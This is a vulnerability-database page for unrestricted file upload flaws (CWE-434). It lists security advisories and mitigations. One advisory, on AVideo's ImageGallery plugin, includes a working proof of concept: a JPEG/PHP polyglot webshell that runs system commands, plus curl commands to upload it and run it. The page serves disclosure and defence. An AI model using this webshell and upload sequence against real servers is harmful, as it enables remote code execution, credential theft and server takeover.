CWE-434
AllowedUnrestricted Upload of File with Dangerous Type
Abstraction: Base · Status: Draft
The product allows the upload or transfer of dangerous file types that are automatically processed within its environment.
5966 vulnerabilities reference this CWE, most recent first.
GHSA-WXG6-F773-G2F7
Vulnerability from github – Published: 2022-05-17 19:57 – Updated: 2024-04-25 20:34Unrestricted file upload vulnerability in server/php/UploadHandler.php in the jQuery File Upload Plugin 6.4.4 for jQuery, as used in the Creative Solutions Creative Contact Form (formerly Sexy Contact Form) before 1.0.0 for WordPress and before 2.0.1 for Joomla!, allows remote attackers to execute arbitrary code by uploading a PHP file with an PHP extension, then accessing it via a direct request to the file in files/, as exploited in the wild in October 2014.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "blueimp/jquery-file-upload"
},
"versions": [
"6.4.4"
]
}
],
"aliases": [
"CVE-2014-8739"
],
"database_specific": {
"cwe_ids": [
"CWE-434"
],
"github_reviewed": true,
"github_reviewed_at": "2024-04-25T20:34:52Z",
"nvd_published_at": "2020-02-08T18:15:00Z",
"severity": "HIGH"
},
"details": "Unrestricted file upload vulnerability in `server/php/UploadHandler.php` in the jQuery File Upload Plugin 6.4.4 for jQuery, as used in the Creative Solutions Creative Contact Form (formerly Sexy Contact Form) before 1.0.0 for WordPress and before 2.0.1 for Joomla!, allows remote attackers to execute arbitrary code by uploading a PHP file with an PHP extension, then accessing it via a direct request to the file in `files/`, as exploited in the wild in October 2014.",
"id": "GHSA-wxg6-f773-g2f7",
"modified": "2024-04-25T20:34:52Z",
"published": "2022-05-17T19:57:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2014-8739"
},
{
"type": "WEB",
"url": "https://wordpress.org/plugins/sexy-contact-form/changelog"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/35057"
},
{
"type": "WEB",
"url": "https://www.exploit-db.com/exploits/36811"
},
{
"type": "WEB",
"url": "http://osvdb.org/show/osvdb/113669"
},
{
"type": "WEB",
"url": "http://osvdb.org/show/osvdb/113673"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2014/11/11/4"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2014/11/11/5"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2014/11/13/3"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "jQuery File Upload Plugin Unrestricted file upload vulnerability"
}
GHSA-WXJW-PHJ6-G75W
Vulnerability from github – Published: 2026-03-25 17:45 – Updated: 2026-03-25 17:45Summary
The ImageGallery::saveFile() method validates uploaded file content using finfo MIME type detection but derives the saved filename extension from the user-supplied original filename without an allowlist check. An attacker can upload a polyglot file (valid JPEG magic bytes followed by PHP code) with a .php extension. The MIME check passes, but the file is saved as an executable .php file in a web-accessible directory, achieving Remote Code Execution.
Details
The vulnerability exists in plugin/ImageGallery/ImageGallery.php in the saveFile() method:
// plugin/ImageGallery/ImageGallery.php:80-108
static function saveFile($file, $videos_id)
{
$allowedMimeTypes = ['image/jpeg', 'image/webp', 'image/gif', 'image/png', 'video/mp4'];
$directory = self::getImageDir($videos_id);
// MIME check on file CONTENT — bypassable with polyglot
$finfo = new finfo(FILEINFO_MIME_TYPE);
$fileType = $finfo->file($file['tmp_name']);
if (in_array($fileType, $allowedMimeTypes)) {
// Extension from attacker-controlled filename — NO allowlist
$extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
do {
$newFilename = uniqid() . '.' . $extension;
$newFilePath = $directory . $newFilename;
} while (file_exists($newFilePath));
move_uploaded_file($file['tmp_name'], $newFilePath);
// ...
}
}
Root cause: Line 93 extracts the extension from the user-supplied $file['name'] and uses it directly in the saved filename. There is no check against an allowlist of safe extensions (e.g., jpg, png, gif, webp, mp4).
Why the MIME check is insufficient: PHP's finfo with FILEINFO_MIME_TYPE inspects file content magic bytes. A file starting with JPEG magic bytes (\xff\xd8\xff\xe0) is identified as image/jpeg regardless of trailing content. Appending PHP code after the JPEG header creates a polyglot that passes the MIME check but executes as PHP when requested via the web server.
Why no server-level protection exists: The root .htaccess at line 73 blocks dangerous extensions but uses the pattern php[a-z0-9]+ — which matches .php5, .phtml, .phar, etc., but intentionally does not match plain .php (since the application itself requires PHP execution). There is no .htaccess in the videos/ directory to disable PHP execution in the upload target.
Upload path: Files are saved to videos/{videoFilename}/ImageGallery/{uniqid}.php — directly accessible via the web server.
The upload endpoint at plugin/ImageGallery/upload.json.php requires:
1. The ImageGallery plugin to be enabled (line 6-8)
2. An authenticated user (line 10-12)
3. The user must have manage permission on the video (line 18-20) — video owner or admin
The response at line 27 calls listFiles() which returns the full URL of each uploaded file, giving the attacker the exact path to their webshell.
PoC
Prerequisites: Authenticated AVideo user account that owns at least one Image or Gallery type video.
Step 1: Create a polyglot PHP/JPEG file
printf '\xff\xd8\xff\xe0\x00\x10JFIF' > shell.php
echo '<?php if(isset($_GET["c"])){system($_GET["c"]);} ?>' >> shell.php
Step 2: Verify it passes finfo detection
file --mime-type shell.php
# Expected output: shell.php: image/jpeg
Step 3: Upload via ImageGallery endpoint
curl -b 'PHPSESSID=<session_cookie>' \
-F "upl=@shell.php;filename=shell.php" \
'https://target/plugin/ImageGallery/upload.json.php?videos_id=<VIDEO_ID>'
Expected response:
{
"videos_id": "123",
"saveFile": true,
"error": false,
"list": [
{
"base": "67890abcdef12.php",
"type": "image/jpeg",
"url": "https://target/videos/video_filename/ImageGallery/67890abcdef12.php"
}
]
}
Step 4: Execute the webshell
curl 'https://target/videos/video_filename/ImageGallery/67890abcdef12.php?c=id'
# Expected output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Impact
An authenticated user with edit permission on any Image/Gallery video can achieve Remote Code Execution as the web server user. This allows:
- Reading sensitive configuration files (database credentials in
videos/configuration.php) - Full database access via the database credentials
- Reading/modifying/deleting any file accessible to the web server process
- Lateral movement within the server's network
- Potential privilege escalation depending on server configuration
Any AVideo instance with the ImageGallery plugin enabled and user registration open is vulnerable. Since regular (non-admin) users can exploit this against their own videos, the barrier to exploitation is low.
Recommended Fix
Add an extension allowlist check in saveFile() immediately after extracting the extension. The extension should be validated against the same set of types as the MIME allowlist:
// plugin/ImageGallery/ImageGallery.php — in saveFile(), after line 93
static function saveFile($file, $videos_id)
{
$allowedMimeTypes = ['image/jpeg', 'image/webp', 'image/gif', 'image/png', 'video/mp4'];
+ $allowedExtensions = ['jpg', 'jpeg', 'webp', 'gif', 'png', 'mp4'];
$directory = self::getImageDir($videos_id);
$finfo = new finfo(FILEINFO_MIME_TYPE);
$fileType = $finfo->file($file['tmp_name']);
if (in_array($fileType, $allowedMimeTypes)) {
$extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
+ if (!in_array($extension, $allowedExtensions)) {
+ return false;
+ }
do {
$newFilename = uniqid() . '.' . $extension;
Additionally, as defense-in-depth, add a .htaccess file to the videos/ directory to disable PHP execution:
# videos/.htaccess
php_flag engine off
<FilesMatch "\.php$">
Require all denied
</FilesMatch>
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "wwbn/avideo"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "26.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33647"
],
"database_specific": {
"cwe_ids": [
"CWE-434"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-25T17:45:40Z",
"nvd_published_at": "2026-03-23T19:16:40Z",
"severity": "HIGH"
},
"details": "## Summary\n\nThe `ImageGallery::saveFile()` method validates uploaded file content using `finfo` MIME type detection but derives the saved filename extension from the user-supplied original filename without an allowlist check. An attacker can upload a polyglot file (valid JPEG magic bytes followed by PHP code) with a `.php` extension. The MIME check passes, but the file is saved as an executable `.php` file in a web-accessible directory, achieving Remote Code Execution.\n\n## Details\n\nThe vulnerability exists in `plugin/ImageGallery/ImageGallery.php` in the `saveFile()` method:\n\n```php\n// plugin/ImageGallery/ImageGallery.php:80-108\nstatic function saveFile($file, $videos_id)\n{\n $allowedMimeTypes = [\u0027image/jpeg\u0027, \u0027image/webp\u0027, \u0027image/gif\u0027, \u0027image/png\u0027, \u0027video/mp4\u0027];\n $directory = self::getImageDir($videos_id);\n\n // MIME check on file CONTENT \u2014 bypassable with polyglot\n $finfo = new finfo(FILEINFO_MIME_TYPE);\n $fileType = $finfo-\u003efile($file[\u0027tmp_name\u0027]);\n\n if (in_array($fileType, $allowedMimeTypes)) {\n // Extension from attacker-controlled filename \u2014 NO allowlist\n $extension = strtolower(pathinfo($file[\u0027name\u0027], PATHINFO_EXTENSION));\n do {\n $newFilename = uniqid() . \u0027.\u0027 . $extension;\n $newFilePath = $directory . $newFilename;\n } while (file_exists($newFilePath));\n\n move_uploaded_file($file[\u0027tmp_name\u0027], $newFilePath);\n // ...\n }\n}\n```\n\n**Root cause:** Line 93 extracts the extension from the user-supplied `$file[\u0027name\u0027]` and uses it directly in the saved filename. There is no check against an allowlist of safe extensions (e.g., `jpg`, `png`, `gif`, `webp`, `mp4`).\n\n**Why the MIME check is insufficient:** PHP\u0027s `finfo` with `FILEINFO_MIME_TYPE` inspects file content magic bytes. A file starting with JPEG magic bytes (`\\xff\\xd8\\xff\\xe0`) is identified as `image/jpeg` regardless of trailing content. Appending PHP code after the JPEG header creates a polyglot that passes the MIME check but executes as PHP when requested via the web server.\n\n**Why no server-level protection exists:** The root `.htaccess` at line 73 blocks dangerous extensions but uses the pattern `php[a-z0-9]+` \u2014 which matches `.php5`, `.phtml`, `.phar`, etc., but intentionally does **not** match plain `.php` (since the application itself requires PHP execution). There is no `.htaccess` in the `videos/` directory to disable PHP execution in the upload target.\n\n**Upload path:** Files are saved to `videos/{videoFilename}/ImageGallery/{uniqid}.php` \u2014 directly accessible via the web server.\n\nThe upload endpoint at `plugin/ImageGallery/upload.json.php` requires:\n1. The ImageGallery plugin to be enabled (line 6-8)\n2. An authenticated user (line 10-12)\n3. The user must have manage permission on the video (line 18-20) \u2014 video owner or admin\n\nThe response at line 27 calls `listFiles()` which returns the full URL of each uploaded file, giving the attacker the exact path to their webshell.\n\n## PoC\n\n**Prerequisites:** Authenticated AVideo user account that owns at least one Image or Gallery type video.\n\n**Step 1: Create a polyglot PHP/JPEG file**\n```bash\nprintf \u0027\\xff\\xd8\\xff\\xe0\\x00\\x10JFIF\u0027 \u003e shell.php\necho \u0027\u003c?php if(isset($_GET[\"c\"])){system($_GET[\"c\"]);} ?\u003e\u0027 \u003e\u003e shell.php\n```\n\n**Step 2: Verify it passes finfo detection**\n```bash\nfile --mime-type shell.php\n# Expected output: shell.php: image/jpeg\n```\n\n**Step 3: Upload via ImageGallery endpoint**\n```bash\ncurl -b \u0027PHPSESSID=\u003csession_cookie\u003e\u0027 \\\n -F \"upl=@shell.php;filename=shell.php\" \\\n \u0027https://target/plugin/ImageGallery/upload.json.php?videos_id=\u003cVIDEO_ID\u003e\u0027\n```\n\n**Expected response:**\n```json\n{\n \"videos_id\": \"123\",\n \"saveFile\": true,\n \"error\": false,\n \"list\": [\n {\n \"base\": \"67890abcdef12.php\",\n \"type\": \"image/jpeg\",\n \"url\": \"https://target/videos/video_filename/ImageGallery/67890abcdef12.php\"\n }\n ]\n}\n```\n\n**Step 4: Execute the webshell**\n```bash\ncurl \u0027https://target/videos/video_filename/ImageGallery/67890abcdef12.php?c=id\u0027\n# Expected output: uid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\n## Impact\n\nAn authenticated user with edit permission on any Image/Gallery video can achieve **Remote Code Execution** as the web server user. This allows:\n\n- Reading sensitive configuration files (database credentials in `videos/configuration.php`)\n- Full database access via the database credentials\n- Reading/modifying/deleting any file accessible to the web server process\n- Lateral movement within the server\u0027s network\n- Potential privilege escalation depending on server configuration\n\nAny AVideo instance with the ImageGallery plugin enabled and user registration open is vulnerable. Since regular (non-admin) users can exploit this against their own videos, the barrier to exploitation is low.\n\n## Recommended Fix\n\nAdd an extension allowlist check in `saveFile()` immediately after extracting the extension. The extension should be validated against the same set of types as the MIME allowlist:\n\n```php\n// plugin/ImageGallery/ImageGallery.php \u2014 in saveFile(), after line 93\nstatic function saveFile($file, $videos_id)\n{\n $allowedMimeTypes = [\u0027image/jpeg\u0027, \u0027image/webp\u0027, \u0027image/gif\u0027, \u0027image/png\u0027, \u0027video/mp4\u0027];\n+ $allowedExtensions = [\u0027jpg\u0027, \u0027jpeg\u0027, \u0027webp\u0027, \u0027gif\u0027, \u0027png\u0027, \u0027mp4\u0027];\n\n $directory = self::getImageDir($videos_id);\n\n $finfo = new finfo(FILEINFO_MIME_TYPE);\n $fileType = $finfo-\u003efile($file[\u0027tmp_name\u0027]);\n\n if (in_array($fileType, $allowedMimeTypes)) {\n $extension = strtolower(pathinfo($file[\u0027name\u0027], PATHINFO_EXTENSION));\n+ if (!in_array($extension, $allowedExtensions)) {\n+ return false;\n+ }\n do {\n $newFilename = uniqid() . \u0027.\u0027 . $extension;\n```\n\nAdditionally, as defense-in-depth, add a `.htaccess` file to the `videos/` directory to disable PHP execution:\n\n```apache\n# videos/.htaccess\nphp_flag engine off\n\u003cFilesMatch \"\\.php$\"\u003e\n Require all denied\n\u003c/FilesMatch\u003e\n```",
"id": "GHSA-wxjw-phj6-g75w",
"modified": "2026-03-25T17:45:40Z",
"published": "2026-03-25T17:45:40Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-wxjw-phj6-g75w"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33647"
},
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/commit/345a8d3ece0ad1e1b71a704c1579cbf885d8f3ae"
},
{
"type": "PACKAGE",
"url": "https://github.com/WWBN/AVideo"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "AVideo Vulnerable to Remote Code Execution via MIME/Extension Mismatch in ImageGallery File Upload"
}
GHSA-WXWV-22PP-CPM7
Vulnerability from github – Published: 2023-06-26 18:30 – Updated: 2024-04-04 05:10Bludit 3.9.2 is vulnerable to Remote Code Execution (RCE) via /admin/ajax/upload-images.
{
"affected": [],
"aliases": [
"CVE-2020-20210"
],
"database_specific": {
"cwe_ids": [
"CWE-434"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-06-26T18:15:09Z",
"severity": "HIGH"
},
"details": "Bludit 3.9.2 is vulnerable to Remote Code Execution (RCE) via /admin/ajax/upload-images.",
"id": "GHSA-wxwv-22pp-cpm7",
"modified": "2024-04-04T05:10:35Z",
"published": "2023-06-26T18:30:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-20210"
},
{
"type": "WEB",
"url": "https://github.com/bludit/bludit/issues/1079"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-X25J-VG36-QV82
Vulnerability from github – Published: 2024-03-26 21:30 – Updated: 2026-04-28 21:34Unrestricted Upload of File with Dangerous Type vulnerability in OnTheGoSystems Types.This issue affects Types: from n/a through 3.4.17.
{
"affected": [],
"aliases": [
"CVE-2023-27440"
],
"database_specific": {
"cwe_ids": [
"CWE-434"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-03-26T20:15:08Z",
"severity": "HIGH"
},
"details": "Unrestricted Upload of File with Dangerous Type vulnerability in OnTheGoSystems Types.This issue affects Types: from n/a through 3.4.17.",
"id": "GHSA-x25j-vg36-qv82",
"modified": "2026-04-28T21:34:15Z",
"published": "2024-03-26T21:30:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27440"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/vulnerability/types/wordpress-toolset-types-plugin-3-4-17-authenticated-arbitrary-file-upload-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-X27M-3HH4-X74R
Vulnerability from github – Published: 2022-05-24 16:49 – Updated: 2023-02-28 18:30In Hunesion i-oneNet version 3.0.7 ~ 3.0.53 and 4.0.4 ~ 4.0.16, the specific upload web module doesn't verify the file extension and type, and an attacker can upload a webshell. After the webshell upload, an attacker can use the webshell to perform remote code exection such as running a system command.
{
"affected": [],
"aliases": [
"CVE-2019-12803"
],
"database_specific": {
"cwe_ids": [
"CWE-434"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-07-10T20:15:00Z",
"severity": "CRITICAL"
},
"details": "In Hunesion i-oneNet version 3.0.7 ~ 3.0.53 and 4.0.4 ~ 4.0.16, the specific upload web module doesn\u0027t verify the file extension and type, and an attacker can upload a webshell. After the webshell upload, an attacker can use the webshell to perform remote code exection such as running a system command.",
"id": "GHSA-x27m-3hh4-x74r",
"modified": "2023-02-28T18:30:17Z",
"published": "2022-05-24T16:49:58Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12803"
},
{
"type": "WEB",
"url": "https://www.boho.or.kr/krcert/secNoticeView.do?bulletin_writing_sequence=35073"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-X284-83MJ-CHV9
Vulnerability from github – Published: 2022-05-14 01:49 – Updated: 2022-05-14 01:49MTAppjQuery 1.8.1 and earlier allows remote PHP code execution via unspecified vectors.
{
"affected": [],
"aliases": [
"CVE-2018-0645"
],
"database_specific": {
"cwe_ids": [
"CWE-434"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-09-07T14:29:00Z",
"severity": "CRITICAL"
},
"details": "MTAppjQuery 1.8.1 and earlier allows remote PHP code execution via unspecified vectors.",
"id": "GHSA-x284-83mj-chv9",
"modified": "2022-05-14T01:49:45Z",
"published": "2022-05-14T01:49:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-0645"
},
{
"type": "WEB",
"url": "https://bit-part.net/news/2018/07/mtappjquery-20180717.html"
},
{
"type": "WEB",
"url": "http://jvn.jp/en/jp/JVN62423700/index.html"
},
{
"type": "WEB",
"url": "http://www.tinybeans.net/blog/2015/06/26-230919.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-X28G-XVCP-C2GX
Vulnerability from github – Published: 2022-05-13 01:32 – Updated: 2022-05-13 01:32SAP Disclosure Management 10.1 allows an attacker to upload any file without proper file format validation.
{
"affected": [],
"aliases": [
"CVE-2018-2404"
],
"database_specific": {
"cwe_ids": [
"CWE-434"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-04-10T15:29:00Z",
"severity": "CRITICAL"
},
"details": "SAP Disclosure Management 10.1 allows an attacker to upload any file without proper file format validation.",
"id": "GHSA-x28g-xvcp-c2gx",
"modified": "2022-05-13T01:32:23Z",
"published": "2022-05-13T01:32:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-2404"
},
{
"type": "WEB",
"url": "https://blogs.sap.com/2018/04/10/sap-security-patch-day-april-2018"
},
{
"type": "WEB",
"url": "https://launchpad.support.sap.com/#/notes/2607052"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/103727"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-X28V-J697-2R2C
Vulnerability from github – Published: 2024-04-16 00:30 – Updated: 2024-08-22 21:31An arbitrary file upload vulnerability in the Add Category function of Codoforum v4.9 allows attackers to execute arbitrary code via uploading a crafted file.
{
"affected": [],
"aliases": [
"CVE-2020-22539"
],
"database_specific": {
"cwe_ids": [
"CWE-434"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-15T22:15:07Z",
"severity": "HIGH"
},
"details": "An arbitrary file upload vulnerability in the Add Category function of Codoforum v4.9 allows attackers to execute arbitrary code via uploading a crafted file.",
"id": "GHSA-x28v-j697-2r2c",
"modified": "2024-08-22T21:31:28Z",
"published": "2024-04-16T00:30:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-22539"
},
{
"type": "WEB",
"url": "https://gist.github.com/s4fv4n/320f536a684650c6948433de8d53713c"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-X28V-V72R-W8FJ
Vulnerability from github – Published: 2021-12-11 00:00 – Updated: 2021-12-15 00:01In Pluck-4.7.15 admin background a remote command execution vulnerability exists when uploading files.
{
"affected": [],
"aliases": [
"CVE-2021-27984"
],
"database_specific": {
"cwe_ids": [
"CWE-434"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-12-10T19:15:00Z",
"severity": "HIGH"
},
"details": "In Pluck-4.7.15 admin background a remote command execution vulnerability exists when uploading files.",
"id": "GHSA-x28v-v72r-w8fj",
"modified": "2021-12-15T00:01:31Z",
"published": "2021-12-11T00:00:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27984"
},
{
"type": "WEB",
"url": "https://github.com/pluck-cms/pluck/issues/98"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-X2C8-QGVG-23WQ
Vulnerability from github – Published: 2026-03-08 18:30 – Updated: 2026-03-08 18:30A security flaw has been discovered in Bytedesk up to 1.3.9. This affects the function uploadFile of the file source-code/src/main/java/com/bytedesk/core/upload/UploadRestController.java of the component SVG File Handler. Performing a manipulation results in unrestricted upload. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. Upgrading to version 1.4.5.1 is able to mitigate this issue. The patch is named 975e39e4dd527596987559f56c5f9f973f64eff7. Upgrading the affected component is recommended.
{
"affected": [],
"aliases": [
"CVE-2026-3748"
],
"database_specific": {
"cwe_ids": [
"CWE-284",
"CWE-434"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-08T16:16:02Z",
"severity": "MODERATE"
},
"details": "A security flaw has been discovered in Bytedesk up to 1.3.9. This affects the function uploadFile of the file source-code/src/main/java/com/bytedesk/core/upload/UploadRestController.java of the component SVG File Handler. Performing a manipulation results in unrestricted upload. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. Upgrading to version 1.4.5.1 is able to mitigate this issue. The patch is named 975e39e4dd527596987559f56c5f9f973f64eff7. Upgrading the affected component is recommended.",
"id": "GHSA-x2c8-qgvg-23wq",
"modified": "2026-03-08T18:30:28Z",
"published": "2026-03-08T18:30:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3748"
},
{
"type": "WEB",
"url": "https://github.com/Bytedesk/bytedesk/issues/18"
},
{
"type": "WEB",
"url": "https://github.com/Bytedesk/bytedesk/issues/18#issue-3993448721"
},
{
"type": "WEB",
"url": "https://github.com/Bytedesk/bytedesk/issues/18#issuecomment-3976672973"
},
{
"type": "WEB",
"url": "https://github.com/Bytedesk/bytedesk/commit/975e39e4dd527596987559f56c5f9f973f64eff7"
},
{
"type": "WEB",
"url": "https://github.com/Bytedesk/bytedesk"
},
{
"type": "WEB",
"url": "https://github.com/Bytedesk/bytedesk/releases/tag/v1.4.5.1"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.349726"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.349726"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.768028"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
Mitigation
Generate a new, unique filename for an uploaded file instead of using the user-supplied filename, so that no external input is used at all.[REF-422] [REF-423]
Mitigation MIT-21
Strategy: Enforcement by Conversion
When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
Mitigation
Consider storing the uploaded files outside of the web document root entirely. Then, use other mechanisms to deliver the files dynamically. [REF-423]
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- For example, limiting filenames to alphanumeric characters can help to restrict the introduction of unintended file extensions.
Mitigation
Define a very limited set of allowable extensions and only generate filenames that end in these extensions. Consider the possibility of XSS (CWE-79) before allowing .html or .htm file types.
Mitigation
Strategy: Input Validation
Ensure that only one extension is used in the filename. Some web servers, including some versions of Apache, may process files based on inner extensions so that "filename.php.gif" is fed to the PHP interpreter.[REF-422] [REF-423]
Mitigation
When running on a web server that supports case-insensitive filenames, perform case-insensitive evaluations of the extensions that are provided.
Mitigation MIT-15
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Mitigation
Do not rely exclusively on sanity checks of file contents to ensure that the file is of the expected type and size. It may be possible for an attacker to hide code in some file segments that will still be executed by the server. For example, GIF images may contain a free-form comments field.
Mitigation
Do not rely exclusively on the MIME content type or filename attribute when determining how to render a file. Validating the MIME content type and ensuring that it matches the extension is only a partial solution.
Mitigation MIT-17
Strategy: Environment Hardening
Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.
Mitigation MIT-22
Strategy: Sandbox or Jail
- Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.
- OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.
- This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.
- Be careful to avoid CWE-243 and other weaknesses related to jails.
CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs
In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.